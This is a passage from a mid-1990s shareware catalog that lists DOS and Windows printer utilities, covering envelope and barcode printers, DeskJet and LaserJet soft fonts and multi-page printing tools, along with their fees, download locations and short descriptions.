DJ-LOPE + Envelope printer/database for DeskJet printer. See full + description on page 103. + + Product: FF Designer Envelopes + Author: M & R Technologies, Inc., 407-951-2268 + Version: 1.2 (12-01-94) + Needs: IBM PC, Windows 3.0 or better. VGA monitor; Hard disk; + Mouse. Printer capable of printing envelopes. + Registration fee: $19.95 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; bonus + utilities; bonus graphics; all ASP-wide offers (see page 6); + discounts on other products. + Look for: FFDELP.ZIP on BBSs; FFDELP.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 7 (or contact userID 72103,505 for + assistance). + Download size: 358k (about 27 minutes with a 2400 baud modem) + Description: + A graphics program which enables you to create envelopes and + letterhead stationary. Features include a drag and drop + interface, allowing you to place text, pictures, lines and + rectangles on your designs. Use all your Windows fonts and + bitmaps! Links to Cardfile for management/importing of + addresses and text. Links to Paintbrush for creating/editing + picture files. Prints many envelope sizes and scales your + layouts to fit on larger envelopes. + + Chapter 2, "Utilities" 98 + + + + Product: GRAB Plus(r) + Author: ZPAY Payroll Systems, Inc., 813-866-8233 + Version: 6.5 (04-26-93) + Needs: IBM PC, DOS 3.0 or better. Any printer that will hold an + envelope. + Registration fee: $39.95 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $15.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 12 months of toll 900# + phone, fax, CompuServe, GEnie, mail support. + Look for: GRAB65?.ZIP on BBSs (multiple files); GRAB*.ZIP on + CompuServe in CIS:OAFORUM forum LIBrary 4 (multiple files) (or + contact userID 76711,1141 for assistance); GRAB65?.ZIP on GEnie + in HOSB forum LIBrary 12 (multiple files) (or contact userID + PAUL.MAYER for assistance). + Download size: 430k (about 32 minutes with a 2400 baud modem) + Description: + This 8k TSR will capture the name and address from your + favorite word processor and send it formatted to an envelope in + your printer. Works on any printer that will hold an envelope + or label. Uses special features of LaserJet, DeskJet, and + PostScript printers. Prints the postal bar codes on your ZIP+4 + zip codes in the address. Includes GRABDB, a database for + storing thousands of names and addresses. Also includes + LaserLabel, a powerful label printing program. + + + Product: LABEL MASTER + Mailing list manager - PC Mag editors choice. See full + description on page 286. + + Product: Mail Machine + Author: TAXWARE + Version: v3.0k (12-24-92) + Needs: IBM PC, DOS 3.1 or better. 420k RAM; Hard disk; HP + LaserJet printer. + Strongly recommended: CGA monitor. + Registration fee: $29.95 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, mail support; disks + of other shareware. + Look for: availability unknown on BBSs; MM30.ZIP on CompuServe in + CIS:HP forum LIBrary 4. + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + Prints envelopes and labels on all HP LaserJet and compatible + printers. Supports labels & envelopes of any size, manual data + entry, ASCII data import, all available fonts, auto discovery + of soft fonts, PCX graphics, POSTNET zip codes, menu and form + driven or batch mode operation, miscellaneous text messages, + copies, and more. Printing is organized into repeatable "jobs." + Extremely flexible. + + Chapter 2, "Utilities" 99 + + + + Product: PrintEnvelope + Author: Maurer Associates, 214-432-0700 + Version: 3.01 (05-15-95) + Needs: IBM PC, Windows 3.0 or better. EGA monitor; Hard disk; + VBRUN300.DLL. + Registration fee: $29.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; quick- + reference card; choice of 31/2" or 51/4" master disk(s); lifetime + unlimited phone, fax, CompuServe, GEnie, mail support; bonus + utilities; bonus data; discounts on upgrades. Lifetime free + upgrading allowed. + Look for: ENVEL301.ZIP on BBSs; ENVEL3.ZIP on GEnie in WINDOWS + forum LIBrary 11 (or contact userID T.MAURER for assistance). + PsL#: 10442 + Download size: 219k (about 17 minutes with a 2400 baud modem) + Description: + Any size envelopes, any size labels, on any printer! Packed + with features like: .BMP graphic return address; address import + from address book or Cardfile or dBASE, or ASCII mail list; + city/state automatically filled in when you type ZIP Code, and + auto-select orientation and paper bins. USPS approved PostNet + barcodes. + + + Product: Public Address + Full featured address manager. See full description on + page 288. + + Product: QENV + Author: Annette Cuomo, 909-591-4956 + Version: 2.5 (08-07-94) + Needs: IBM PC, DOS 4.0 or better. + Registration fee: $15.00 + Registration benefits: 3 months of support. Master disks, + support, upgrade discounts. + Look for: QENV.ZIP on BBSs (call 714-730-6743 to download it at + no charge); QENV.ZIP on CompuServe in CIS:IBMSYS forum LIBrary + 7 (or contact userID 73747,3537 for assistance). + Download size: 110k (about eight minutes with a 2400 baud modem) + Description: + Provides an extremely easy way of printing an envelope. Just + enter the data and press a key to print. Automatically stores + the names & addresses for the envelopes printed which can then + be incorportated into the mail merge function (letter writing). + If using with a LaserJet or compatible printer the U.S. Postal + bar codes are included on the envelope. + + Chapter 2, "Utilities" 100 + + + + Product: UnderBar + Author: Binary Systems + Version: 2.2 (02-25-93) + Needs: IBM PC, DOS 2.0 or better. 3k RAM; Program can run safely + on a system with no hard disk and only one floppy disk drive. + Registration fee: $35.00 + Registration benefits: 51/4" master disk(s); 6 months of BBS, + CompuServe, GEnie, mail support. + Look for: UNDBAR.ZIP on BBSs (call 813-684-5248 to download it at + no charge); UNDBAR.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 9 (or contact userID 72775,240 for assistance); + UBAR.ZIP on GEnie in IBMPC forum LIBrary 15 (or contact userID + L.PENDARVIS for assistance). + Download size: 87k (about seven minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + TSR to print a Delivery Point Bar Code under any address which + ends with a 9-digit Zip Code. Works automatically with any + mailing label, word processor, or database program you already + use. Works with LaserJet, IBM 24-pin ProPrinter, and 9- and + 24-pin Epson-compatible printers. + + + Product: WinGRAB for Windows + Author: ZPAY Payroll Systems, Inc., 813-866-8233 + Version: 2.0 (08-31-93) + Needs: IBM PC, Windows 3.0 or better. EGA monitor; Hard disk. + Any printer that will hold an envelope. + Strongly recommended: Modem; Mouse. + Registration fee: $39.95 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $15.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of toll 900# phone, fax, CompuServe, + GEnie, mail support. + Look for: WINGRB20.ZIP on BBSs; WINGRA.ZIP on CompuServe in + CIS:OAFORUM forum LIBrary 4 (or contact userID 76711,1141 for + assistance); WINGRB20.ZIP on GEnie in HOSB forum LIBrary 11 (or + contact userID PAUL.MAYER for assistance). + Download size: 380k (about 28 minutes with a 2400 baud modem) + Description: + This is the Microsoft Windows version of the GRAB Plus(r) + envelope addressing system. Prints the name and address from + within your Windows application specially formatted for your + printer. Prints postal barcodes on LaserJet, DeskJet, and + PostScript printers. Comes with macros to attach to Word for + Windows and Ami Professional. See GRAB Plus(r) in this catalog + also. Use on multiple printers for both envelopes and labels. + Phone contact manager and more! + + Chapter 2, "Utilities" 101 + + + + Product: Winvelope [***] + Author: Winvelope Software, 606-832-2493 + Version: 5.0 (06-04-95) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $20.00 (Canadian dollars) (add $4.00 (Canadian + dollars) for shipping to Canadian addresses) (add $4.00 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited phone, fax, BBS, + CompuServe, mail support; 1-month limited return policy; all + ASP-wide offers (see page 6). 6-month free upgrading allowed. + Look for: WENV50.ZIP on BBSs (call 606-832-4029 to download it at + no charge); WENV50.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71620,24 for assistance). + PsL#: 10401 + Download size: 306k (about 23 minutes with a 2400 baud modem) + Description: + Envelope printing utility for Windows. Includes selectable + envelope size, fonts, return addresses, graphic logos, postnet + barcodes, automatic printer setup, and more. Address Manager + database stores address data in MS Access file format. + Attractive, user-friendly interface. BEGIN QUOTATION "This is a + most excellent envelope printing program..." - Robert Mullen, + author, Windows 3.1 Hyperguide END QUOTATION + + + Product: WonderBar + Author: Binary Systems + Version: 4.4 (04-20-93) + Needs: IBM PC, DOS 2.0 or better. 3k RAM; Program can run safely + on a system with no hard disk and only one floppy disk drive. + Registration fee: $35.00 + Registration benefits: 51/4" master disk(s); 6 months of BBS, + CompuServe, GEnie, mail support. + Look for: WUNBAR.ZIP on BBSs (call 813-684-5248 to download it at + no charge); WUNBAR.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 9 (or contact userID 72775,240 for assistance); + WBAR.ZIP on GEnie in IBMPC forum LIBrary 15 (or contact userID + L.PENDARVIS for assistance). + Download size: 89k (about seven minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Intercepts all output to your printer. It sends everything + right along until it sees a "^" followed by 5 to 50 digits, + whereupon it prints a bar code instead. By this means, you can + print a POSTNET code anywhere you wish: on an envelope, a + mailing label, or a letter (for window envelopes). This will + work with whatever mail list, database, or word processor + program you already use. Works on HP LaserJets, IBM 24-pin + ProPrinters, and both 9- and 24-pin Epson compatibles. + + Chapter 2, "Utilities" 102 + + + + 2.4.5 Printer specific + + Product: Citizen [***] + Author: R.K. West Consulting + Version: 4.0 (05-13-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. Citizen MSP or Tribute printer. + Strongly recommended: Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: CTZN40.ZIP on BBSs; CITZEN.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 125k (about ten minutes with a 2400 baud modem) + Description: + This menu-driven utility lets you control the fonts on your + Citizen MSP or Tribute printer. You can also print small text + files and type envelopes from the program. + + + Product: CrabWise + Author: Shawn Anderson SoftWare, 309-787-4967-(X227) + Version: 1.0 (01-01-94) + Needs: IBM PC, DOS 2.11 or better. 300k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. IBM Proprinter. + Strongly recommended: EGA monitor. + Registration fee: $15.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited fax, CompuServe, mail + support; royalty-free source code; royalty-free runtime + license; bonus templates; all ASP-wide offers (see page 6). + 6-month free upgrading allowed. 1 free update disk(s) sent + out. Font charts. + Look for: availability unknown on BBSs. + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + A text-file landscape printer for the IBM Proprinter series. + + + 2.4.5.1 Epson + + Product: DMPLAS (Dot Matrix to LaserJet) + Translate IBM/Epson FX print to HP LaserJet. See full + description on page 109. + + Product: ESF's TrueType Collection 1 + Ten TrueType fonts plus tutorial & setup. See full description + on page 138. + + Chapter 2, "Utilities" 103 + + + + Product: HQ-FAX (1-Step High Quality FAX + One-step high quality FAX. See full description on page 439. + + Product: LABELS-PLUS Labeling System + Bar code label print system. See full description on page 94. + + 2.4.5.2 HP DeskJet + + Product: 4Print/4Book DOS + Paper saving utility for LaserJets & DeskJets. See full + description on page 107. + + Product: 4Print/4Book Windows + 4Print/4Book DOS + 4PrinW Windows interface. See full + description on page 107. + + Product: 4Shell for Windows + Runs 4Print and 4Book under Windows. See full description on + page 108. + + Product: BOOKLET + PC booklet printing utility. See full description on page 108. + + Product: DJ-CHECK + Author: JMJ Software, 704-525-1472 + Version: 2.01 (04-29-93) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Hard disk; HP DeskJet printer. + Registration fee: $14.95 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; bonus utilities. + Look for: DJCHEK.ZIP on BBSs; DJCHEK.ZIP on CompuServe in + CIS:HPPER forum LIBrary 5 (or contact userID 75160,2530 for + assistance); DJCHEK.ZIP on GEnie in IBMPC forum LIBrary 15. + Download size: 60k (about five minutes with a 2400 baud modem) + Description: + Print any size checks (personal or business) using DeskJet + printer. Fully configurable for perfect printing placement on + any size check. Keeps a record on disk or each check you print, + and keeps a running balance as you print checks. + + Chapter 2, "Utilities" 104 + + + + Product: DJ-LOPE + Author: JMJ Software, 704-525-1472 + Version: 4.01 (03-27-93) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Hard disk; HP DeskJet printer. + Registration fee: $14.95 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; bonus utilities. + Look for: DJLOPE.ZIP on BBSs; DJLOPE.ZIP on CompuServe in + CIS:HPPER forum LIBrary 5 (or contact userID 75160,2530 for + assistance); DJLOPE.ZIP on GEnie in IBMPC forum LIBrary 15. + Download size: 88k (about seven minutes with a 2400 baud modem) + Description: + Print envelopes on the DeskJet family of printers on the fly or + from multiple databases of up to 250 adresses each. Multiple + return addresses, new user interface, prints PostNet barcodes. + Supports internal and cartridge fonts. Toggle return address on + or off, search, add, delete records. Prints to LPT1, 2 or 3. + Easy-to-use menu driven interface. Runs from DOS or as a DOS + application under Windows 3.x. Does not support 550C or + Portable models. + + + Product: DJ-SLEEVE + Author: JMJ Software, 704-525-1472 + Version: 2.0 (01-19-93) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Hard disk; HP DeskJet printer. + Registration fee: $14.95 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; bonus utilities. + Look for: SLEEVE.ZIP on BBSs; SLEEVE.ZIP on CompuServe in + CIS:HPPER forum LIBrary 5 (or contact userID 75160,2530 for + assistance); SLEEVE.ZIP on GEnie in IBMPC forum LIBrary 5. + Download size: 25k (about two minutes with a 2400 baud modem) + Description: + Just slip a floppy disk in Drive A or Drive B, load this easy- + to-use program, and in just seconds your DeskJet will print out + a sleeve template containing the names of all the files (date + and size for each file, too). Just cut it out, fold back the + flaps and tape or glue, and you have a storage sleeve for your + 51/4" & 31/2" disks. + + Chapter 2, "Utilities" 105 + + + + Product: ESF's DeskJet Fonts & Utilities + Author: Elfring Soft Fonts, 708-377-3520 + Version: 1.7 (08-24-93) + Needs: IBM PC, DOS 2.1 or better. HP DeskJet printer. + Registration fee: $25.00 + Registration benefits: 3 months of phone support. + Look for: DJFNT7.ZIP on BBSs; DJFNT7.ZIP on CompuServe in CIS:HP + forum LIBrary 5 (multiple files) (or contact userID 72417,3437 + for assistance). + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + Collection of 18 soft fonts for HP DeskJet printers. (All 3 + models.) Printer drivers for WordPerfect 5.0 & 5.1, MS Word + 5.X, MS Works, PC Write, and Windows 3.0. Fonts include Helv & + Roman 10 & 12 point medium/bold/italic, Script & Old English 8 + & 10 point, Symbols 24 point, and Square 10 point 10 pitch. + Utility programs for downloading and printing sample pages. + Easy to use install program and new tutorial on soft fonts. + + + Product: ESF's European DeskJet Fonts + Author: Elfring Soft Fonts, 708-377-3520 + Version: 1.2 (05-21-92) + Needs: IBM PC, DOS 2.1 or better. HP DeskJet printer. DeskJet + RAM cartridge. + Registration fee: $25.00 + Registration benefits: 3 months of phone support. + Look for: EDJFNT2.ZIP on BBSs; EDFNT2.ZI on CompuServe in CIS:HP + forum LIBrary 5. + Download size: 340k (about 25 minutes with a 2400 baud modem) + Description: + A collection of 12 soft fonts that print in almost any western + European language, including English, German, French, & + Spanish. Includes Roman, Helv, and Garamond in 12 point m/b/i + + 18 point bold all with the PC-8 symbol set. Also has utilities + for downloading and sample page printing. Printer drivers for + WordPerfect 5.1, MS Word 5.X, MS Works, and Windows are + included. Now with easy install program and tutorial on soft + fonts. + + + Product: ESF's PC Write Fonts + Soft fonts, printer drivers, & utilities. See full description + on page 110. + + Product: ESF's TrueType Collection 1 + Ten TrueType fonts plus tutorial & setup. See full description + on page 138. + + Product: LASR_MAN + A laser/ink jet printer with many styles. See full description + on page 112. + + Chapter 2, "Utilities" 106 + + + + Product: Top Fonts Sampler + A collection of eight TrueType scalable fonts. See full + description on page 141. + + Product: TSR Download + Soft font manager for LaserJets & DeskJets. See full + description on page 90. + + 2.4.5.3 HP LaserJet + + Product: 4Print/4Book DOS + Author: Korenthal Associates, Inc., 212-242-1790 + Version: 4.16 (06-01-94) + Needs: IBM PC, DOS 2.0 or better. 200k RAM; HP DeskJet printer; + HP LaserJet printer. + Registration fee: $49.95 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; + 2-month return policy; bonus utilities; all ASP-wide offers + (see page 6); discounts on upgrades. + Look for: availability unknown on BBSs; 4PRINT.ZIP on CompuServe + in CIS:KORENTHAL forum LIBrary 3 (or contact userID 76004,2605 + for assistance). + Download size: 240k (about 18 minutes with a 2400 baud modem) + Description: + Prints 2 or 3 fully readable pages of text on each sheet of + paper using your LaserJet's or DeskJet's landscape (sideways) + printing capability. Can print on both sides of the page to + yield 4, 6, or even more pages of text per sheet. Perfect for + program listings and documentation; can print one wide column + for spreadsheet and database reports. Includes 4Book for + creating handsome booklets. Supports A4 paper. "Definitely + worth adding to your printer toolbox," says PC Magazine. + + + Product: 4Print/4Book Windows + Author: Korenthal Associates, Inc., 212-242-1790 + Version: 4.16 (06-01-94) + Needs: IBM PC, DOS 2.0 or better. 200k RAM; HP DeskJet printer; + HP LaserJet printer; VBRUN300.DLL. + Registration fee: $69.95 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 2-month return policy; bonus + + Chapter 2, "Utilities" 107 + + + + utilities; all ASP-wide offers (see page 6); discounts on + upgrades. + Look for: availability unknown on BBSs; 4PRINW.ZIP on CompuServe + in CIS:KORENTHAL forum LIBrary 3 (or contact userID 76004,2605 + for assistance). + Download size: 240k (about 18 minutes with a 2400 baud modem) + Description: + Includes the full 4Print/4Book DOS package (see above) plus + 4PrinW, our new Windows interface. It lets you specify all + 4Print/4Book options via graphical Windows dialogs plus extra + features such as user-defined, named print styles. + + + Product: 4Shell for Windows + Author: ZPAY Payroll Systems, Inc., 813-866-8233 + Version: 1.4 (03-17-92) + Needs: IBM PC, Windows 3.0 or better. 4Print and 4Book from + Korenthal Associates. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of toll 900# phone, fax, CompuServe, GEnie, mail + support. + Look for: 4SHELL.ZIP on BBSs; 4SHELL.ZIP on CompuServe in + CIS:OAFORUM forum LIBrary 4 (or contact userID 76711,1141 for + assistance); 4SHELL.ZIP on GEnie in IBMPC forum LIBrary 5 (or + contact userID P.MAYER1 for assistance). + Download size: 75k (about six minutes with a 2400 baud modem) + Description: + Lets you use the popular LaserJet and DeskJet utilities, 4Print + and 4Book, under Windows. You *must* download the file + 4PR410.ZIP (from Korenthal Associates) in order to use this + program. This allows you to select the options and build a + "configuration" for both 4Print and 4Book and save the options + as your default. + + Chapter 2, "Utilities" 108 + + + + Product: BOOKLET + Author: Sympathetic Software + Version: 4.5 (10-02-94) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; HP DeskJet printer; HP LaserJet printer. + Registration fee: $20.00 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited CompuServe, mail support. 36-month free + upgrading allowed. + Look for: availability unknown on BBSs; BOOKL*.ZIP on CompuServe + in CIS:IBMHW forum LIBrary 2 (multiple files) (or contact + userID 71046,1476 for assistance). + PsL#: 10366 + Download size: 175k (about 13 minutes with a 2400 baud modem) + Description: + Creates PC booklet sized documents from full page documents. + Prints four pages of the document on each sheet of paper. The + pages are printed "half size" two pages per side of the paper + turned sideways. Handles A4, letter, legal, and exec paper. + Also prints single sided. + + Converts word processor HPPCL output to fit the reduced size. + Formatting is preserved. Extensive error recovery allows + restart after jams or other printing failures. Use menu/screen + or command line interface with online help. + + + Product: DMPLAS (Dot Matrix to LaserJet) + Author: Software Co-op, 317-856-6052 + Version: 1.1 (11-15-91) + Needs: IBM PC, DOS 2.0 or better. 6k RAM. + Registration fee: $32.00 + Registration benefits: Printed manual, master disks, phone/BBS/ + mail support. + Look for: DMPLAS??.ZIP on BBSs (multiple files) (call + 715-652-2758 to download it at no charge); DMPLS*.ZIP on + CompuServe in CIS:PCHW forum LIBrary 2 (multiple files) (or + contact userID 76635,1670 for assistance). + Download size: 240k (about 18 minutes with a 2400 baud modem) + Description: + Small TSR (6k) captures and translates IBM/Epson FX output for + the HP LaserJet. Works with both text and graphics programs + (including GRAPHICS.COM). Uses native LaserJet (or compatible) + fonts or your softfonts. Optional Courier italic and + proportional fonts are also included. Prints at accurate scale + (for filling in forms) or slightly reduced vertical spacing to + print 66 lines per page. Graphics can also be compressed to fit + on the LaserJet's 10" page. + + Chapter 2, "Utilities" 109 + + + + Product: ESF's European LaserJet Fonts + Author: Elfring Soft Fonts, 708-377-3520 + Version: 1.2 (05-20-92) + Needs: IBM PC, DOS 2.1 or better. HP LaserJet printer. + Registration fee: $25.00 + Registration benefits: 3 months of phone support. + Look for: ELFNT2.ZIP on BBSs; ELFNT2.ZI on CompuServe in CIS:HP + forum LIBrary 4 (multiple files) (or contact userID 72417,3437 + for assistance). + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + A collection of 12 soft fonts print in any western European + language. They work on any HP LaserJet II or better printer and + offer: English, German, French, Spanish, etc. Printer drivers + are included for WordPerfect 5.0 & 5.1, MS Word 5.X, MS Works, + Ventura, and Windows 3.0. Utilites are included that will + download the fonts and print sample sheets of them. All fonts + have the PC-850 symbol set and include: Helv, Roman, & Garamond + in 12 point medium/bold/italic + 18 point bold. New tutorial on + fonts. + + + Product: ESF's LaserJet Fonts & Util. + Author: Elfring Soft Fonts, 708-377-3520 + Version: 1.7 (08-24-93) + Needs: IBM PC, DOS 2.1 or better. HP LaserJet printer. + Registration fee: $25.00 + Registration benefits: 3 months of phone support. + Look for: LJFNT7.ZIP on BBSs; LJFNT7.ZIP on CompuServe in CIS:HP + forum LIBrary 4 (multiple files) (or contact userID 72417,3437 + for assistance). + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + Collection of 23 soft fonts for HP LaserJet or compatible + printers. Includes printer drivers for WordPerfect 5.0 & 5.1, + MS Word 5.X, MS Works, Ventura, & Windows. Utility programs + include DOWNLOAD, DISPFONT, & FONTINFO. Fonts include: Helv & + Roman 10 & 12 point medium/bold/italic, Helv & Roman 18 pt + bold, 12 pt Century Legal, Script, Flourish, 18 pt Broadway & + Dingbats, 10 pt KeyCaps, 10 pt Greek, 12 & 14 pt Black Chan. + Easy INSTALL program to unpack fonts and new tutorial on soft + fonts. + + Chapter 2, "Utilities" 110 + + + + Product: ESF's PC Write Fonts + Author: Elfring Soft Fonts, 708-377-3520 + Version: 1.0 (09-25-92) + Needs: IBM PC, DOS 2.1 or better. HP DeskJet printer; HP + LaserJet printer. PC Write. + Registration fee: $35.00 + Registration benefits: 3 months of phone support; discounts on + other products. + Look for: PCWFNT.ZIP on BBSs; PCWFNT.ZIP on CompuServe in CIS:HP + forum LIBrary 4 (multiple files) (or contact userID 72417,3437 + for assistance). + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + A collection of 13 display soft fonts for HP LaserJet or HP + DeskJet printers. Utility programs include DOWNLOAD, & + DISPFONT. Fonts include: Black Chan, Cooper Black, Cursive + Elegant, Dom Casual, Hobo, Old English, Revue, Stencil, & Zap + Chance. Easy install program to unpack fonts and new tutorial + on soft fonts. + + + Product: ESF's Scalable LJ III Fonts + Author: Elfring Soft Fonts, 708-377-3520 + Version: 1.3 (08-24-93) + Needs: IBM PC, DOS 2.1 or better. HP LaserJet III, IIIP, IIID, + or IIIsi printer. + Registration fee: $29.50 (add $4.00 for shipping to U.S. + addresses) (add $5.50 for shipping to Canadian addresses) (add + $9.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of phone support. + Look for: LJ3FNT.ZIP on BBSs; LJ3FNT.ZIP on CompuServe in CIS:HP + forum LIBrary 4 (or contact userID 72417,3437 for assistance). + Download size: 234k (about 18 minutes with a 2400 baud modem) + Description: + Five scalable display soft fonts for the HP LaserJet III family + of printers: Baha, Baha Bold, Cooper, Cooper Italic, Penior, + Penior Bold, Rounded, & Rounded Bold. (Similar to: Bauhaus, + Cooper Black, Peignot, & VAG Rounded.) It also has printer + drivers for WordPerfect 5.1 & MS Word 5.X. Utility programs: + DOWNLOAD sends fonts to your printer, MAPSCAL prints a sample + sheet of a scalable font along with our standard install + program make this an easy to use package. + + Chapter 2, "Utilities" 111 + + + + Product: ESF's Super Fonts I + Author: Elfring Soft Fonts, 708-377-3520 + Version: 1.3 (08-24-93) + Needs: IBM PC, DOS 2.1 or better. HP LaserJet printer. + Registration fee: $35.00 (add $4.00 for shipping to U.S. + addresses) (add $5.50 for shipping to Canadian addresses) (add + $9.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of phone support; discounts on + other products. + Look for: SUPFN1.ZIP on BBSs; SUPFN1.ZIP on CompuServe in CIS:HP + forum LIBrary 4 (multiple files) (or contact userID 72417,3437 + for assistance). + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + A collection of 17 display soft fonts for HP LaserJet or + compatible printers. Includes printer drivers for WordPerfect + 5.0 & 5.1, MS Word 5.X, MS Works, Ventura, & Windows. Utility + programs include DOWNLOAD, & DISPFONT. Fonts include: Black + Chan, Cooper Black, Cursive Elegant, Dom Casual, Hobo, Old + English, Revue, Stencil, & Zap Chance. Easy install program to + unpack fonts and new tutorial on soft fonts. + + + Product: ESF's TrueType Collection 1 + Ten TrueType fonts plus tutorial & setup. See full description + on page 138. + + Product: GridForm + Prints custom graph paper on LaserJets. See full description + on page 87. + + Product: LASR_MAN + Author: MicroMetric, 813-377-2515 + Version: 6.05 (10-31-94) + Needs: IBM PC, DOS 3.0 or better. HP DeskJet printer; HP + LaserJet printer. HP DeskJet/LaserJet or compatable. + Strongly recommended: Hard disk. + Registration fee: $40.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. + Look for: LMAN605A.ZIP on BBSs (multiple files) (call + 813-371-2490 to download it at no charge); LASMAN.ZIP on + CompuServe in CIS:IBMHW forum LIBrary 2 (or contact userID + 71631,744 for assistance). + Download size: 316k (about 24 minutes with a 2400 baud modem) + Description: + Laser printer utility for ASCII files with hundreds of styles - + great for program manuals and listings, draft documents, wide + spreadsheets, database and address listings, legal documents. + Styles include: portrait/landscape orientation with any of 5 + + Chapter 2, "Utilities" 112 + + + + fonts of 10-32 characters/inch printing on one or both sides of + each sheet; multiple text pages/sheet - 2 to 200; booklets with + 1-75 files each. Many options: border/text page dividers, + custom covers, header/footers, letter/legal/A4/exec paper, + more++. + + + Product: LJ-SLEEVE + Author: JMJ Software, 704-525-1472 + Version: 2.0 (06-11-92) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Hard disk; HP LaserJet printer. + Registration fee: $14.95 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support. + Look for: LJSLEV.ZIP on BBSs; LJSLEV.ZIP on CompuServe in + CIS:HPPER forum LIBrary 4 (or contact userID 75160,2530 for + assistance); LJSLEV.ZIP on GEnie in IBMPC forum LIBrary 5. + Download size: 25k (about two minutes with a 2400 baud modem) + Description: + Just slip a floppy disk in Drive A or Drive B, load this easy- + to-use program, and in just seconds your LaserJet or compatible + printer will print out a sleeve template containing the names + of all the files (date and size for each file, too). Just cut + it out, fold back the flaps and tape or glue, and you have a + storage sleeve for your 51/4" & 31/2" disks. + + + Product: LJLAND + Author: TAXWARE + Version: v3.11b (07-01-93) + Needs: IBM PC, DOS 2.0 or better. 256k RAM; HP LaserJet printer. + Registration fee: $29.95 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, mail support; all + ASP-wide offers (see page 6); disks of other shareware. + Look for: availability unknown on BBSs; LJLND.ZIP on CompuServe + in CIS:HP forum LIBrary 4. + Download size: 105k (about eight minutes with a 2400 baud modem) + Description: + Prints text files (program listings, spreadsheets, databases, + documentation) in a variety of formats on all LaserJet and + compatible printers. Supports 1-up thru 5-up formats, + duplexing, multiple files, wildcards, intelligent wordwrap, + headers, titles, net jobs, output redirection, paper source, + short & long binder format, greenbar, multiple copies, + alternate fonts, page ranges, environment variable for default + options, half-sheet, legal & A4 paper, & more. + + Chapter 2, "Utilities" 113 + + + + Product: Mail Machine + Prints envelopes & labels on all LaserJets. See full + description on page 98. + + Product: PCX2FNT + Author: TAXWARE + Version: v1.2 (04-18-92) + Needs: IBM PC, DOS 2.0 or better. 256k RAM; HP LaserJet printer. + Strongly recommended: CGA monitor; 